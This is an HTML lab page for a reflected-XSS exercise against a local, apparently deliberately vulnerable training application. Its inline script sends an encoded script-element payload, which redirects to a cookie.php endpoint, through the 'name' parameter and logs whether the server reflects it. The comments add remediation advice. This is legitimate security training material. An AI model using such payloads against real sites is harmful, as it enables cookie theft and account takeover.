<!doctype html>
<!--
  Lab page for a reflected-XSS exercise against an application on localhost:81.
  The inline script requests the application's "name" parameter endpoint with a
  script element as the value and logs what comes back, so the tester can see
  whether the value is reflected without encoding.
  NOTE(review): the /vulnerabilities/xss_r/ path looks like a deliberately
  vulnerable training application; confirm the target before reusing this page.
-->
<html>
  <head>
    <meta charset="UTF-8">
    <title>XSS Reflected</title>
    <script>
      // Script text carried by the test value: if a browser executed it, the
      // page would navigate to cookie.php on the same lab host. What that
      // endpoint does is not visible from this file.
      var scriptText = 'document.location.href="http://localhost:81/myfiles/cookie.php"';
      console.log(scriptText);

      // The tag names are split across two literals so this inline script never
      // contains a literal closing script tag, which would end the element early.
      var markup = '<' + 'script>' + scriptText + '<' + '/script>';
      console.log(markup);

      // Percent-encode the markup so it travels as a single query-string value.
      var queryValue = encodeURIComponent(markup);

      var xhr = new XMLHttpRequest();

      // Logs the response body on every readyState transition, so early calls
      // print an empty or partial body before the final one.
      // Seeing the script element in this output shows that the server reflects
      // the parameter unencoded. It does not show execution: an XHR response is
      // handed to this script as data and is never parsed into this document.
      // NOTE(review): if this page is served from another origin, the body is
      // only readable here when the server permits it through CORS.
      xhr.addEventListener("readystatechange", function () {
        console.log(xhr.response);
      });

      // Remediation for the reflecting endpoint: HTML-encode the "name" value
      // when writing it into the page. A Content-Security-Policy that disallows
      // inline script and HttpOnly session cookies limit the impact further.
      xhr.open("GET", "http://localhost:81/vulnerabilities/xss_r/?name=" + queryValue, true);
      xhr.send();
    </script>
  </head>
  <body>
    <h1>My webpage</h1>
  </body>
</html>